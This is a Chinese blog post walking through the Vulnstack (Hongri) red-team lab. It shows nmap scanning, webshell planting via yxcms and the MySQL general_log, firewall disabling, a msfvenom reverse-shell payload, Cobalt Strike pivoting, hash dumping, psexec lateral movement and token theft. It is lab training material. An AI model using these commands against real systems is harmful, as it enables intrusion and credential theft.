<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fina.jpg#%20%E7%94%A8%E4%BA%8E%E8%8B%B9%E6%9E%9C%E8%AE%BE%E5%A4%87%E7%9A%84%20icon">
  <link rel="icon" type="image/png" href="/img/fina.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>红日ATT&amp;CK红队评估靶场(一) - Hexo</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-11-14 14:06">
      2020年11月14日 下午
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.6k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      21
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>&nbsp;&nbsp;红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&amp;CK攻击链路进行搭建，开成完整闭环。后续也会搭建真实APT实战环境，从实战中成长。关于环境可以模拟出各种各样实战路线，目前给出作者实战的一套攻击实战路线如下，虚拟机所有统一密码：hongrisec@2019</p>
<p>&nbsp;&nbsp;<a href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/" target="_blank" rel="noopener">链接</a></p>
<p>&nbsp;&nbsp;下载解压后三个虚拟机，win7一个网卡作为供外网访问，另一个连接内网；winSer08和winSer03作为内网。靶机登陆后IP地址都是固定ip，不建议进行更改成DHCP设置，新建两个192.168.52.0和192.168.72.0的虚拟网段即可。下面是网络设置。</p>
<p><img src="https://i.loli.net/2020/11/14/a8QczJRHjtLTPpN.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;下面是实际配置，依次为win7、winSer08、winSer03、kali</p>
<p><img src="https://i.loli.net/2020/11/14/eVTg6QByf9wzW83.png" srcset="/img/loading.gif" alt=""><br><img src="https://i.loli.net/2020/11/14/p8dkEY61ms3ztGb.png" srcset="/img/loading.gif" alt=""><br><img src="https://i.loli.net/2020/11/14/apfFMUIi45AmkT2.png" srcset="/img/loading.gif" alt=""><br><img src="https://i.loli.net/2020/11/14/bgeX6JlZif1RuTp.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;进入winSer08和winSer03需要修改密码，而进入win7需要开启phpstudy（路径：c盘根目录下的phpstudy）,内网中能够ping通即可</p>
<h2 id="外网服务器"><a href="#外网服务器" class="headerlink" title="外网服务器"></a>外网服务器</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>&nbsp;&nbsp;通过nmap对目标服务器进行信息收集</p>
<pre><code>root@kali:~/桌面# nmap -sV -A -T4 192.168.72.129
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 14:43 CST
Nmap scan report for 192.168.72.129
Host is up (0.00036s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014</code></pre><p>&nbsp;&nbsp;nmap扫出开放目标开放了mysql数据库和web端口，接下来通过dirmap遍历目录 </p>
<pre><code>[200][application/x-rar-compressed][3.00mb] http://192.168.72.129/beifen.rar                                                                    
[200][text/html][70.40kb] http://192.168.72.129/phpinfo.php                                                                                     
[200][text/html; charset=utf-8][4.28kb] http://192.168.72.129/phpMyadmin/                                                                       
[200][text/html; charset=utf-8][4.28kb] http://192.168.72.129/phpmyadmin/                                                                       
[200][text/html; charset=utf-8][4.28kb] http://192.168.72.129/phpMyAdmin/                                                                       
[200][text/html; charset=utf-8][4.28kb] http://192.168.72.129/phpmyAdmin/                                                                       
[200][text/html; charset=utf-8][14.39kb] http://192.168.72.129//l.php </code></pre><p>&nbsp;&nbsp;扫出了一个名为beifen.rar、phpadmin还有一个php探针。接下里访问网页看看</p>
<p><img src="https://i.loli.net/2020/11/14/gjyFxWOYa6Hn3fA.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;这里爆出了服务器的路径,往下拉还看到了mysql检测</p>
<p><img src="https://i.loli.net/2020/11/14/3bU4MC5x76N9EoF.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;顺手检测一波找出弱口令：root;root</p>
<p>&nbsp;&nbsp;访问刚刚显示的benfen.rar发现可以将网站备份源码下载下来</p>
<p><img src="https://i.loli.net/2020/11/14/3RUVrxqI5cutjTl.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;文件目录显示yxcms，这里可以进行一波代码审计</p>
<p>&nbsp;&nbsp;这里先访问cms</p>
<p><img src="https://i.loli.net/2020/11/14/sfDqOXrwBbtu3Lc.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;在首页公告显示了进入后台的路径以及账号密码</p>
<p><img src="https://i.loli.net/2020/11/14/wuVCyIUFdt84MKT.png" srcset="/img/loading.gif" alt=""></p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="后台利用"><a href="#后台利用" class="headerlink" title="后台利用"></a>后台利用</h4><p>&nbsp;&nbsp;对服务器后台利用,先利用之前发现弱口令进入网站后台</p>
<p><img src="https://i.loli.net/2020/11/14/nZDEXwkFGlM81mu.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;然后发现前台模板中存在可以新建文件，写入小马。或者也可以利用编辑功能往已存在的模板中添加小马</p>
<p><img src="https://i.loli.net/2020/11/14/2yJx7n5migtWCDF.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;再根据之前下载的备份查找到写入小马的路径：protected/apps/default/view/default/xxxx 。对网址进行访问文件夹出现路径泄露</p>
<p><img src="https://i.loli.net/2020/11/14/jDWLSCGOyarx4X6.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;上蚁剑连接成功</p>
<p><img src="https://i.loli.net/2020/11/14/mKNOZ2xA6d7rhDb.png" srcset="/img/loading.gif" alt=""></p>
<h4 id="phpmyadmin利用"><a href="#phpmyadmin利用" class="headerlink" title="phpmyadmin利用"></a>phpmyadmin利用</h4><p>&nbsp;&nbsp;参数一下这篇 <a href="https://www.freebuf.com/articles/web/226240.html" target="_blank" rel="noopener">文章</a> </p>
<p>&nbsp;&nbsp;先查询有没有读写权限，查询结果无，证明无法通过 into outfile 写入shell</p>
<pre><code>select @@secure_file_priv；</code></pre><p><img src="https://i.loli.net/2020/11/14/iuVB6jGg9nlAcRH.png" srcset="/img/loading.gif" alt=""></p>
<p><img src="https://i.loli.net/2020/11/14/tx1oPTMJcgjZGAl.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;通过日志文件来试试</p>
<pre><code>show variables like &apos;%general%&apos;;//查询全局日志变量</code></pre><p><img src="https://i.loli.net/2020/11/14/pgXA1zWl4YJBeks.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;目前日志保存的功能是关闭的，需要打开再进行</p>
<pre><code>set global general_log = &quot;ON&quot;;
set global general_log_file = &quot;C:/phpstudy/WWW/log.php&quot;; </code></pre><p><img src="https://i.loli.net/2020/11/14/tLilMD4VPJmUhny.png" srcset="/img/loading.gif" alt=""></p>
<p><img src="https://i.loli.net/2020/11/14/QIjsomMA196k7rB.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;然后写入小马,再蚁剑连接</p>
<p><img src="https://i.loli.net/2020/11/14/LKOG5W37xflmbCN.png" srcset="/img/loading.gif" alt=""></p>
<p><img src="https://i.loli.net/2020/11/14/EbWAfHmsX4Q295h.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;文章里还提供一种新建表来getshell的方法，这里也试验一下</p>
<p>&nbsp;&nbsp;先新建一个数据库</p>
<p><img src="https://i.loli.net/2020/11/14/Bq7nWtdsUwfalSQ.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;对数据库新建一个表，表内字段要设置成text字段</p>
<p><img src="https://i.loli.net/2020/11/14/XReZvhPyqVQsxM6.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;再插入数据</p>
<p><img src="https://i.loli.net/2020/11/14/DCUticyIkzYL37R.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;由于没有写入权限后面就完成不了，接下里就是将新建的数据库删除</p>
<h3 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h3><p>&nbsp;&nbsp;不需要提权进去就是管理员</p>
<p><img src="https://i.loli.net/2020/11/14/c5e9wFgoy7zvXZs.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;先对本机信息收集</p>
<p><img src="https://i.loli.net/2020/11/14/83RgOJZlpDoMnfG.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;这里先将防火墙关闭以便进行反弹shell</p>
<pre><code>netsh firewall set opmode disable</code></pre><p><img src="https://i.loli.net/2020/11/14/FqfBn5DclkUopxi.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;然后利用msfvenom制作木马，然后蚁剑上传</p>
<pre><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=7777 -f exe &gt; shell.exe</code></pre><p>&nbsp;&nbsp;msf通过exploit/multi/handler模块监听，这时访问上传的exe,这里注意payload的设置</p>
<pre><code>set payload windows/meterpreter/reverse_tcp</code></pre><p><img src="https://i.loli.net/2020/11/14/5t7XVhmYRyAQgaT.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;接下来准备cs上线，新建一个监听</p>
<p><img src="https://i.loli.net/2020/11/14/anR4OJD5dkjMGrt.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;生成payload</p>
<p><img src="https://i.loli.net/2020/11/14/LYcAU6hg95qK8bX.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;蚁剑上传exe并执行,cs上显示靶机上线</p>
<p><img src="https://i.loli.net/2020/11/14/jGg86NzU4dktEaD.png" srcset="/img/loading.gif" alt=""></p>
<h2 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h2><h3 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h3><p>&nbsp;&nbsp;尝试在cs中进行收集主机信息</p>
<p>&nbsp;&nbsp;查看本机权限</p>
<p><img src="https://i.loli.net/2020/11/14/ZoIDnpvr82zXyuW.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;发现存在dns服务器</p>
<p><img src="https://i.loli.net/2020/11/14/SjUTJfoOHG42mzt.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;net user 存在三个账户</p>
<p><img src="https://i.loli.net/2020/11/14/Ueai461Z2TRdwoB.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;net config Workstation服务运行时，显示或更改工作站各项服务的设置</p>
<p><img src="https://i.loli.net/2020/11/14/5d1OetFVnLiakNz.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;查看主域</p>
<p><img src="https://i.loli.net/2020/11/15/SiH5gl7aN4yM9P2.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;查找时间服务器</p>
<p><img src="https://i.loli.net/2020/11/15/Nac7JIU39OMwVhL.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;通过上面找到dns服务器找ip:192.168.52.138</p>
<p><img src="https://i.loli.net/2020/11/15/Z9JwYmlDK1T8rHx.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;查看域内用户</p>
<p><img src="https://i.loli.net/2020/11/15/GKCtSZjgb74RYPD.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;查看域内用户详细信息</p>
<p><img src="https://i.loli.net/2020/11/15/Wu3arSMQfgwKI6H.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;查看域管理用户</p>
<p><img src="https://i.loli.net/2020/11/15/W9FvJ4DySP5Y1lr.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;查看域主机</p>
<p><img src="https://i.loli.net/2020/11/15/yGHpQzBcdKqv2Ls.png" srcset="/img/loading.gif" alt=""></p>
<h3 id="横向探测"><a href="#横向探测" class="headerlink" title="横向探测"></a>横向探测</h3><p>&nbsp;&nbsp;将msf与cs联动</p>
<pre><code>use exploit/multi/handler 
set payload windows/meterpreter/reverse_http
set lhost 192.168.72.128
set lport 7777</code></pre><p>&nbsp;&nbsp;设置cs</p>
<p><img src="https://i.loli.net/2020/11/15/kK7apn8XcVQLwlj.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;选中已控制的主机点击增加会话,再选择刚刚添加的msf</p>
<p><img src="https://i.loli.net/2020/11/15/o5IDEsUQjTaCNcZ.png" srcset="/img/loading.gif" alt=""></p>
<p><img src="https://i.loli.net/2020/11/15/EnQh2SzVC6R4i8g.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;需要等心跳时间到了再到msf中查看</p>
<p><img src="https://i.loli.net/2020/11/15/grPUzDSTjkflCGc.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;在cs的beacon内右键、目标选择已获取ip选择net view</p>
<p><img src="https://i.loli.net/2020/11/15/dILsSYObWUJcDVz.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;选择上方的目标，即可跳转到显示域内用户</p>
<p><img src="https://i.loli.net/2020/11/15/Wpg4ExrLC8sGHVP.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;cs内可以通过hashdump和logonpasswords读取密码</p>
<p><img src="https://i.loli.net/2020/11/15/BN8p9xVjEcStYIT.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;这里通过插件ladon的cs插件模式来进行探测</p>
<p><img src="https://i.loli.net/2020/11/15/l3ZheMjAKOQBsxu.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;扫描网段内存活主机信息</p>
<pre><code>Ladon 192.168.52.0/24 OsScan</code></pre><p><img src="https://i.loli.net/2020/11/15/KP18jNwZCVxrMQU.png" srcset="/img/loading.gif" alt=""></p>
<h3 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h3><p>&nbsp;&nbsp;因为52网段和kali所在的72网段不能互通，故需要通过smb beacon让主机连接</p>
<p><img src="https://i.loli.net/2020/11/15/fhyGMboLgZtn7D4.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;然后设置和上面msf相似</p>
<p><img src="https://i.loli.net/2020/11/15/t8hWgrYIjGJ3V9n.png" srcset="/img/loading.gif" alt=""></p>
<h4 id="psexec"><a href="#psexec" class="headerlink" title="psexec"></a>psexec</h4><p>&nbsp;&nbsp;接下来选择dc，使用psexec模块</p>
<p><img src="https://i.loli.net/2020/11/15/BAyvIYj4LWzU6Z5.png" srcset="/img/loading.gif" alt=""></p>
<p><img src="https://i.loli.net/2020/11/15/pS6TIE1Q9sfJZvw.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;会话中显示多了一个主机</p>
<p><img src="https://i.loli.net/2020/11/15/CzqrflF2P4M6gOd.png" srcset="/img/loading.gif" alt=""></p>
<h4 id="token窃取"><a href="#token窃取" class="headerlink" title="token窃取"></a>token窃取</h4><p>&nbsp;&nbsp;这里选择已控制的主机,选择进程列表</p>
<p><img src="https://i.loli.net/2020/11/15/pMyCb24GSEHUqAR.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;点开空白，点击下方steal token</p>
<p><img src="https://i.loli.net/2020/11/15/K6CwM58cYeQDGN1.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;选择想要的user即可</p>
<p><img src="https://i.loli.net/2020/11/15/j5tSisDyLRwOk4f.png" srcset="/img/loading.gif" alt=""></p>
<p>&nbsp;&nbsp;选中还未控制的主机，注意选择令牌</p>
<p><img src="https://i.loli.net/2020/11/15/SEdtekxMlD8JK4C.png" srcset="/img/loading.gif" alt=""></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>&nbsp;&nbsp;<a href="https://soapffz.com/sec/558.html#menu_index_1" target="_blank" rel="noopener">ATT&amp;CK 实战 - 红日安全 vulnstack (一)</a></p>
<p>&nbsp;&nbsp;<a href="https://www.freebuf.com/column/231111.html" target="_blank" rel="noopener">ATT&amp;CK实战 | Vulnstack 红队（一）</a></p>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>
                    
                      <a class="hover-with-bg" href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/">红日靶场</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/11/07/cute/">
                        <span class="hidden-mobile">cute</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "红日ATT&CK红队评估靶场(一)&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















</body>
</html>
